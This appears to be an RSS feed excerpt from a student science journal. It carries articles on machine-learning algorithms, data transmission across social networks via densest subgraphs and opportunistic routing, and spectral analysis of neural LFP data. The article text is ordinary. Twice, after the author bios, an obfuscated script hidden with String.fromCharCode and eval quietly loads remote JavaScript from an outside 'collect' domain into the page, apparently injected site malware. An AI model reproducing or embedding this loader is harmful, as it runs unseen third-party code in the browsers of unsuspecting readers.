<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/04/image-17.png" alt="" class="wp-image-1868" width="473" height="314" srcset="https://exploratiojournal.com/wp-content/uploads/2022/04/image-17.png 760w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-17-300x199.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-17-230x153.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-17-350x232.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-17-480x318.png 480w" sizes="(max-width: 473px) 100vw, 473px" /></figure>



<p>Again, we see that all the graphs look fairly linear, however, since we have multiple different features of the car that we must take into account, we use multi-linear regression. The full code can be found at: https://github.com/ABehniwal/face-recognition/blob/main/Multi-Linear-Regression. ipynb</p>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Amanbir Behniwal</h5><p>Amanbir is currently an 11th grader at the Vincent Massey Secondary School in Ontario, Canada. He enjoys challenging myself with difficult math and computer science problems by participating in various contests. Amanbir is an avid fan of Barcelona and has been playing soccer for many years. Amongst other things, he likes to read books, help others with problem-solving, and delve deeper into the field of computer science.
</p></figure></div>



<p></p>
<script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/</script><p>The post <a href="https://exploratiojournal.com/the-theory-and-implementation-of-common-machine-learning-algorithms/">The Theory and Implementation of Common Machine Learning Algorithms</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Data Transmission Via Social Network Sites</title>
		<link>https://exploratiojournal.com/data-transmission-via-social-network-sites/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=data-transmission-via-social-network-sites</link>
		
		<dc:creator><![CDATA[Geonwoo Kim]]></dc:creator>
		<pubDate>Sun, 24 Apr 2022 14:22:33 +0000</pubDate>
				<category><![CDATA[Computer Science]]></category>
		<category><![CDATA[data science]]></category>
		<category><![CDATA[data transmission]]></category>
		<category><![CDATA[social networks]]></category>
		<guid isPermaLink="false">https://www.exploratiojournal.com/?p=1839</guid>

					<description><![CDATA[<p>Geonwoo Kim<br />
Crean Lutheran High School</p>
<p>The post <a href="https://exploratiojournal.com/data-transmission-via-social-network-sites/">Data Transmission Via Social Network Sites</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img loading="lazy" decoding="async" width="405" height="423" src="https://www.exploratiojournal.com/wp-content/uploads/2022/04/KakaoTalk_20211119_143622236.jpg" alt="" class="wp-image-1840 size-full" srcset="https://exploratiojournal.com/wp-content/uploads/2022/04/KakaoTalk_20211119_143622236.jpg 405w, https://exploratiojournal.com/wp-content/uploads/2022/04/KakaoTalk_20211119_143622236-287x300.jpg 287w, https://exploratiojournal.com/wp-content/uploads/2022/04/KakaoTalk_20211119_143622236-230x240.jpg 230w, https://exploratiojournal.com/wp-content/uploads/2022/04/KakaoTalk_20211119_143622236-350x366.jpg 350w" sizes="(max-width: 405px) 100vw, 405px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author: </strong>Geonwoo Kim<br><strong>Mentor</strong>: Dr. Charalampos Tsourakakis<br><em>Crean Lutheran High School</em></p>
</div></div>



<h2 class="wp-block-heading">Introduction</h2>



<p>The advancement of the internet gave way to a new form of online interaction supported by social network sites. Over the past years, social network sites have witnessed tremendous growth in numbers. Over one billion users on Facebook and hundreds of millions on Pinterest, Twitter, and Google+. Sharing information on these social network sites has now changed how people communicate. Through the sites, an individual can create a public profile, connect with users with whom one has a connection, and share messages, videos, and images. This has led to unpredictable and emerging sharing, prorogation, interaction, and content creation amongst users. However, one of the most important and active research areas has been understanding the information diffusion on social network sites. Information diffusions refer to how information is spread among interconnected entities or nodes in a network. Studying information diffusions is linked to beneficial outcomes such as determining the various factors that affect the whole process. In addition, studying off data to data transmission across social network sites can help in various sectors such as marketing. The data transmitted in most cases on social network sites involves the source content: the images, video, or texts posted and includes geolocation, posting time, and other meta information.<br>&nbsp;</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="898" height="880" src="https://www.exploratiojournal.com/wp-content/uploads/2022/04/image.png" alt="" class="wp-image-1841" srcset="https://exploratiojournal.com/wp-content/uploads/2022/04/image.png 898w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-300x294.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-768x753.png 768w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-230x225.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-350x343.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-480x470.png 480w" sizes="(max-width: 898px) 100vw, 898px" /></figure>



<h2 class="wp-block-heading">Background</h2>



<h4 class="wp-block-heading"><strong>Densest Subgraphs</strong></h4>



<p>According to Dasgupta and Gupta (1), social networks have been created by the billions of users who carry out various activities, including creating their profiles, linking, following, posting content commenting, and other online interactions. In most cases, evolved graphs have been used in modeling social media whereby nodes represent the entities, content, themes, and other meta-data. A typical social media graph will have both end and node properties in most cases. However, Dasgupta and Gupta (2) note that there has been increased research on determining the various subgraphs that allow various analysts to determine the connection between two nodes for years. The sparse nature of social media graphs supports the emergence of various ends between the two nodes (Faloutsos, McCurley, and Tomkins 1). Unlike in other graph analyses,&nbsp; when analyzing social media subgraphs, the representation of a single relationship between two nodes using a single path is limiting. It is thus essential to ensure that the connection between subgraphs is determined in the fastest way possible since it will help in identifying the few most likely transmissions paths of a disease, joke, information leak, or rumor from one user to the other (Faloutsos, McCurley and Tomkins 1). More importantly, this will make it easier to ascertain the unexpected affiliation between individuals or other members. Using graphs will help summarize the connection between two SNS users, thus providing the fastest means of determining how the data is transmitted between the users.</p>



<p>Given the importance of graphs in studying connections between SNS users, it will allow one to map out all the edges and identify the social position of every user. Yazdi et al. (141) note that the best strategy for analyzing data to data transmission across social network sites is using the theory of graphs. The diffusion patterns of information across SNS and its distribution have become a key study area. However,&nbsp; Yazdi et al.(142) argue that one of the most challenging problems has been finding out the best and fastest strategy to help determine and study data to data transmission across SNS and thus predict the diffusions paths based on an actual data that has many applications in critical areas such as gossips news, blog postings, virus resource detection, e-commerce among others. The popularity of given news plays an avital role in determining the nodes influenced in the future, which helps to ensure that nodes that influence the past are used in outlining the transmissions of the news. In this case, the future nodes will be predicted as a function of time (Yazdi et al., 142). The Louvain community detection algorithm was a widely used data to data transmissions research strategy. However, the inability to control the centers of clusters and their numbers made it ineffective. The importance of the centers of clusters is that they help in information propagation.</p>



<p>However,&nbsp; the densest subgraph algorithm can overcome the inefficiencies of the Louvain community detection algorithm since it supports a more efficient center of clusters provisions. Epasto, Lattanzi, and Sozio (1) note that various data analysis tasks such as distance query indexing, event detection, community detection, computational biology, among others, have been improved with the emergence of finding densest subgraphs. The various users across SN have been compared to actual communities, given that most share similar interests or have an affiliation to the same company, university, or other organization. In most cases, the emergence of certain words affiliated to place, cities, company names of even persons on tweets and posts can indicate something affiliated to a given event about to take place. The emergence of the densest subgraph algorithms has been used to study the data-to-data transmission across SNS. This allows analysts to determine the compact representation of node distances in a graph. This, in turn, allows them to compute the distance between two nodes and time and determine the data transmissions rates.</p>



<p>In most cases, new people will always join SNS while others leave, new friendships will be formed, and others will end. Moreover, new tweets and postings on SNS&nbsp; such as Facebook and Twitter will mean the older tweets have become less interesting. The result is that the SNS users&#8217; communities will evolve with time, leading to the emergence of new events that trigger the formation of new densest subgraphs. The node distances will continually change in the long run, thus calling for frequent re-indexing. This can thus significantly hinder research into data-to-data transmission across SNS hence requiring algorithms that can keep up with the ever-evolving users and large and highly dynamic data input streams.</p>



<p>Moreover, graphs have been used to identify various concepts, not only social media but also biological and financial networks. However, given that the common problem is to find the most significant number of connections between nodes, there is a need to determine the best solution. Given that most communities within social media networks are based on the formation of communities, this will lead to a need for a mathematical task that will help detect data-to-data transmissions between various users known as the densest subgraph. In most cases, the number of edges divided by the maximum possible number of edges equals the density of a&nbsp;k-node subgraph. This indicates that by finding the density of graphs, one will determine the data-to-data transmission between various communities and even narrow it down to the respective metadata such as location and time. Tsourakakis (1) argues that various data mining techniques have been employed to determine the data-to-data transmissions across SNS. Most subgraph techniques have tried to ascertain which ones are near-cliques, resulting in the emergence of the NP=hard problem associated with the densest subgraph. However, there have been many types of research aimed at coming up with solutions towards solving the densest NP=hard problem, and it has proven to be solvable hence making the algorithm more effective than previous graph mining applications (Tsourakakis, 1).</p>



<p>Various graph density concepts are used in determining the densest subgraph. One of the concepts is edge density. In these cases, one determines the density measure by dividing the number of edges with the node numbers. Another fundamental concept is the k-core that allows one to ascertain the subgraph with the largest minimum degree instead of its average degree. The K-core concept was introduced in 1970 by&nbsp; Lick and White and was later analyzed in many other papers (Farago and Mojaveri 4). The k-core has been widely used in the densest subgraph since it is easy to find algorithmically. Therefore, mathematically speaking, the densest subgraph would be the best means for analyzing data to data transmissions on social media websites.</p>



<p>On the other hand, transmitting data from one user across social media websites is essential. The development of mobile-based communications has allowed people to access various SNS&nbsp; on their smartphones. Various challenges have marred the traditional mesh network, making it hard for data transmissions from one user to the other ( Yang, Wu, and Luo 1). This has led to the emergence of an opportunistic network that, unlike the traditional mesh network, does not support the advanced setting of the network size and node location. In addition, there is no deed for setting up a complete path between the target node and the source node. The main advantage of the opportunistic network is that it allows nodes to enter the communication range, thus facilitating a much faster exchange of data between users. Yang, Wu, and Luo (2) note that the opportunistic network will thus help eliminate the problems arising from the wireless technology networks, such as network delays network splits, and also be able to ensure that the network communication is much less expensive.</p>



<h4 class="wp-block-heading"><strong>Opportunistic Networks</strong></h4>



<p>Opportunistic networks are linked to remote area network transmission, handheld devices networking, in-vehicle networking, and tracking wildlife. However, with the invention of the&nbsp; 5G network, tablet and Bluetooth computers, smartphones and laptops have increased in number and have also been widely distributed across large geographical areas. People can now move from one place to another with the devices, which has led to the formation of a social node. Therefore, unlike the traditional signal transmissions, which affect data transmission across nodes by affecting data acceptances opportunist network improves the broadcast characteristics within the interference range hence eliminating node broadcast delay (Yang, Wu, and Luo, 2). This will lead to low latency and high data transmission across the SNS.</p>



<p>&nbsp;More importantly, opportunist networks across SNS will ensure that it supports the store-carry-forward transmission strategy. In this strategy, the data is sent from the source node to the destination node even when there is no network availability (Xiao and Wu 3). However, to ensure that the opportunistic networks support efficient data transmissions across SNS, it is vital to have an efficient routing algorithm in place. The study on routing algorithms s aim opportunities networks has been widely debated, leading to the proposal of countless routing algorithms. Vahdat Amin and David Becker proposed the epidemic routing algorithm using several meeting nodes to help in data transmissions. The epidemic routing algorithm has been cited as supporting a reduced data transmissions delay improving the average hops and average delay times. Another algorithm referred to as Spray and Wait were proposed by Spyropoulos et al. (253), which sought to overcome the various shortcomings associated with the epidemic algorithm. This algorithm works based on two phases: spray and wait for phase. The L copies of the data are sprayed by the source node towards neighboring nodes, after which the wait phase starts. One must wait for some time before the messages are thus sprayed to the destination node. The core aim of the Spray and Wait algorithm is to support a much faster transfer rate across nodes. It is thus essential to ensure that the best routing algorithm is selected when setting up opportunistic networks to support faster data transmission rates across SNS.</p>



<h2 class="wp-block-heading"><strong>Conclusion</strong></h2>



<p>Data to data transmission across social network sites is essential since it supports the ongoing interaction between the users. Across social network sites, information diffusion represents the process via which data and information are transmitted from one user to the other across social network sites. Every social network site must ensure that the information diffusion process is fast to eliminate any disappointment amongst users. Therefore, when studying data to data transmissions across social network sites, one of the fastest ways to support the whole process is using the densest subgraphs. The densest subgraph makes it easier for analysis to map out all the data-to-data transmissions between users, thus making it easier to ascertain the social position of every user. The densest subgraph helps overcome the inefficiencies slinked with the Louvain community detection algorithm. On the other hand, data-to-data transmissions from one user to the other are critical. The traditional wireless technologies have been marred by high latency rates and low data transmission. The ever-increasing smartphone, tablet, and Bluetooth computers have made distributing users across a larger geographical zone easier. However,&nbsp; with the emergence of the 5G network, using an opportunistic network will support a much faster data-to-data transmission. However, it is essential to ensure that the routing algorithm uses &nbsp; supports&nbsp; the fast data-to-data transmission when using an opportunistic network.</p>



<h2 class="wp-block-heading">Works Cited</h2>



<p>Dasgupta, Subhasis, and Amarnath Gupta. &#8220;Discovering interesting subgraphs in social media networks.&#8221;&nbsp;<em>2020 IEEE/ACM International Conference on Advances in Social Networks Analysis and Mining (ASONAM)</em>. IEEE, 2020.</p>



<p>Epasto, Alessandro, Silvio Lattanzi, and Mauro Sozio. &#8220;Efficient densest subgraph computation in evolving graphs.&#8221;&nbsp;<em>Proceedings of the 24th international conference on the world wide web</em>. 2015</p>



<p>Faloutsos, Christos, Kevin S. McCurley, and Andrew Tomkins. &#8220;Connection subgraphs in social networks.&#8221;&nbsp;<em>SIAM International Conference on Data Mining, Workshop on Link Analysis, Counterterrorism and Security</em>. Vol. 2. 2004.</p>



<p>Faragó, András, and Zohre R Mojaveri. &#8220;In search of the densest subgraph.&#8221;&nbsp;<em>Algorithms</em>&nbsp;12.8 (2019): 157.</p>



<p>Spyropoulos, T., Psounis, K., &amp; Raghavendra, C. S. (2005, August). Spray and wait: an efficient routing scheme for intermittently connected mobile networks. In&nbsp;<em>Proceedings of the 2005 ACM SIGCOMM workshop on Delay-tolerant networking</em>&nbsp;(pp. 252-259).</p>



<p>Tsourakakis, Charalampos E. &#8220;A novel approach to finding near-cliques: The triangle-densest subgraph problem.&#8221;&nbsp;<em>arXiv preprint arXiv:1405.1477</em>&nbsp;(2014).</p>



<p>Vahdat, Amin, and David Becker. &#8220;Epidemic routing for partially connected ad hoc networks.&#8221; (2000): 2019.</p>



<p>Xiao, Yutong, and Jia Wu. &#8220;Data transmission and management based on node communication in opportunistic social networks.&#8221;&nbsp;<em>Symmetry</em>&nbsp;12.8 (2020): 1-13.</p>



<p>Yang, Weiyu, Jia Wu, and Jingwen Luo. &#8220;Effective data transmission and control based on social communication in social opportunistic complex networks.&#8221;&nbsp;<em>Complexity</em>&nbsp;2020 (2020).</p>



<p>Yazdi Majbouri, Kasra, Adel Majbouri Yazdi, Saeid Khodayi, Jingyu Hou, Wanlei Zhou, Saeed Saedy, and Mehrdad Rostami. &#8220;Prediction optimization of diffusion paths in social networks using integration of ant colony and densest subgraph algorithms.&#8221;&nbsp;<em>Journal of High-Speed Networks</em>&nbsp;26, no. 2 (2020): 141-153.</p>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/04/KakaoTalk_20211119_143622236.jpg" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Geonwoo Kim</h5><p>Geonwoo is currently a Junior at the Crean Lutheran High School in Irvine, California
</p></figure></div>



<p></p>
<script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/</script><p>The post <a href="https://exploratiojournal.com/data-transmission-via-social-network-sites/">Data Transmission Via Social Network Sites</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Neural Data Analysis Using Spectral Techniques</title>
		<link>https://exploratiojournal.com/neural-data-analysis-using-spectral-techniques/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=neural-data-analysis-using-spectral-techniques</link>
		
		<dc:creator><![CDATA[Gitika Tirumishi Jada]]></dc:creator>
		<pubDate>Sun, 10 Oct 2021 13:07:13 +0000</pubDate>
				<category><![CDATA[Biology]]></category>
		<category><![CDATA[Scientific]]></category>
		<category><![CDATA[biology]]></category>
		<category><![CDATA[data science]]></category>
		<category><![CDATA[neural networks]]></category>
		<category><![CDATA[Science]]></category>
		<guid isPermaLink="false">https://www.exploratiojournal.com/?p=1043</guid>

					<description><![CDATA[<p>Gitika Tirumishi Jada<br />
CMR Institute Of Technology, Bangalore</p>
<p>The post <a href="https://exploratiojournal.com/neural-data-analysis-using-spectral-techniques/">Neural Data Analysis Using Spectral Techniques</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img decoding="async" width="200" height="200" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-488 size-full" srcset="https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png 200w, https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1-150x150.png 150w" sizes="(max-width: 200px) 100vw, 200px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author: Gitika Tirumishi Jada</strong><br><em>CMR Institute Of Technology, Bangalore<br></em>September 1, 2021</p>
</div></div>



<h2 class="wp-block-heading">1. Introduction</h2>



<p>Data science is the study of data. It is a concept that unifies statistics, data analysis,<br>informatics and their related methods to understand the actual phenomena with data. Data<br>science in an interdisciplinary field focused on extracting large data sets (for example big<br>data) and applying the knowledge gained from that data to solve problems in a wide<br>range of application domains.</p>



<p>The methods used in processing the data seen in this paper are similar to that of signal<br>processing. Digital signal processing is used to process discrete time signals. Some of the<br>algorithms or techniques used in this are, Discrete time Fourier Transform (DFT), Fast<br>Fourier Transform (FFT), Finite Impulse Response (FIR), etc,. Along with these, we<br>make use of spectrograms to study the properties of these signals in different domains.</p>



<p>In this report, we will make use of LFP (local field potential) data, which is a form of<br>neural data. The data is read from the brain by a certain probe inserted in it. These<br>micro-needles are inserted in various parts of the brain, thus giving rise to many signals<br>recorded at different spatial locations. We want to discuss how to perform neural analysis<br>of these brain signals in both the frequency and time domain, therefore we introduce the<br>DFT and FFT techniques as well as the short time Fourier Transform STFT and the<br>spectrogram. Correlations of these LFP signals are introduced towards the end of the<br>report to investigate the relation among the signals and give an idea on how the brain<br>functions when subjected to certain tasks and which parts of it are functionally connected.</p>



<h2 class="wp-block-heading">2. Time series</h2>



<p>Time series is simply the collection of data over a period of time or at different points in<br>time. In most cases, a time series is a sequence taken at successive, equally spaced points.<br>Therefore it is called a sequence of discrete time data or a regular time series. In other<br>cases, if the time series is not taken over equally spaced points in time, it is called an<br>irregular time series. There can also be a change in the number of variables, resulting in a<br>multivariate time series.</p>



<p>This time series provides a source of additional information that can be analysed and used<br>in the prediction process. Time series analysis refers to the relationships between<br>different points in time within a single series.</p>



<p>Often while dealing with time series and data in the time domain, we use sampling as a<br>method to analyse the signal. In signal processing, when we are comparing and sampling<br>multiple signals, we come across an effect called aliasing. This is an effect that causes<br>different signals to be indistinguishable when sampled if they are sampled at different<br>rates. It can also refer to the distortion or artifact that results when a signal reconstructed<br>from its samples has not the same sample rate as the original signal.</p>



<p>One such example of a time series is neural data signals. There are many types, the<br>Electro-encephalogram (EEG), the Local field potential (LPF), etc,. These are the data<br>taken from the brain signals. They are used in understanding how the brain works,<br>essentially which part of the brain has more activity when subjected to certain tasks. We<br>will be discussing more on the LFP in the later sections.</p>



<h4 class="wp-block-heading">2.1 Time domain and frequency domain</h4>



<p>The time domain is where signals are plotted with respect to time. Time domain analysis<br>is the analysis of this time series with reference to time. In the time domain, the signal’s<br>value is understood as a real number at various instances. A graph in the time domain<br>shows how the signals change with respect to time.</p>



<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-17.png" alt="" class="wp-image-1202" width="493" height="307" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-17.png 860w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-17-300x187.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-17-768x479.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-17-230x143.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-17-350x218.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-17-480x299.png 480w" sizes="(max-width: 493px) 100vw, 493px" /><figcaption>Fig 1: A cosine wave represented in the time domain, with a time period of 1000s. This wave was generated by mixing (adding) two different cosine waves with different periods.<br></figcaption></figure></div>



<p>The frequency domain is where the signals are plotted with respect to frequency rather<br>than time. Now we can say, the frequency domain analysis is the analysis of a function or<br>a series in the frequency domain. A frequency domain displays how much of the signal<br>exists within a given frequency band concerning a range of frequencies.</p>



<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-18.png" alt="" class="wp-image-1203" width="616" height="406" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-18.png 838w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-18-300x198.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-18-768x506.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-18-230x152.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-18-350x231.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-18-480x316.png 480w" sizes="(max-width: 616px) 100vw, 616px" /><figcaption>Fig 2: This is the same mixture of cosine waves shown in Fig. 1 here displayed in the frequency domain. As we can see, there are two frequency components, one at 10000 Hz with an amplitude of 0.9 and another at 10 Hz with an amplitude of 2.8</figcaption></figure></div>



<h4 class="wp-block-heading">2.2 Fourier Transform</h4>



<p>A given function or signal can be converted between the time domain and the frequency domain by using certain mathematical operators called transforms. The most commonly used is the Fourier transform. What this does is, it converts the time function into an integral of simple waves like sines and cosines. The spectrum of the frequency components is the frequency domain representation of the signal. The Fourier transform of a signal x(t) can be represented as</p>



<figure class="wp-block-image size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.06.35-PM.png" alt="" class="wp-image-1205" width="374" height="124" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.06.35-PM.png 780w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.06.35-PM-300x99.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.06.35-PM-768x254.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.06.35-PM-230x76.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.06.35-PM-350x116.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.06.35-PM-480x159.png 480w" sizes="(max-width: 374px) 100vw, 374px" /></figure>



<p>The original signal can be reconstructed by applying an inverse Fourier transform. This can be written as-</p>



<figure class="wp-block-image size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.06.42-PM.png" alt="" class="wp-image-1204" width="364" height="128" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.06.42-PM.png 714w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.06.42-PM-300x106.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.06.42-PM-230x81.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.06.42-PM-350x124.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.06.42-PM-480x169.png 480w" sizes="(max-width: 364px) 100vw, 364px" /></figure>



<h4 class="wp-block-heading">2.3 Discrete Time Fourier Transform </h4>



<p>The Fourier transform deals with infinite number of samples, whereas the discrete time Fourier transform otherwise known as discrete Fourier transform (DFT) is a type of Fourier transform which converts finite number of equally spaced samples of a function in the time domain into a complex valued function of the same length in the frequency domain. Since experimentally we never have infinite time series acquisition, we always have to deal with finite time series and, therefore, we use the Discrete Fourier transform instead. The latter is expressed in formulas as&nbsp;</p>



<figure class="wp-block-image size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.09.04-PM-1024x406.png" alt="" class="wp-image-1206" width="531" height="211" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.09.04-PM-1024x406.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.09.04-PM-300x119.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.09.04-PM-768x305.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.09.04-PM-920x365.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.09.04-PM-230x91.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.09.04-PM-350x139.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.09.04-PM-480x190.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.09.04-PM.png 1064w" sizes="(max-width: 531px) 100vw, 531px" /></figure>



<p>This creates a spectrum of all the frequency components present in the signal, similarly to the Fourier Transform. One of the many applications of the discrete Fourier transform is spectral analysis. When a sequence is represented as x{t} with samples uniformly spaced, the DFT can tell us about the frequency components of the signal or, in other words, the spectral content of the signal. </p>



<h4 class="wp-block-heading">2.4 Power Spectral Density</h4>



<p>We can also derive a power spectrum from a time series. The power spectrum S<sub>xx</sub>(ω) of a time series denoted by x(t) is the absolute value of the Frequency spectrum obtained by taking the DFT of the said time series. </p>



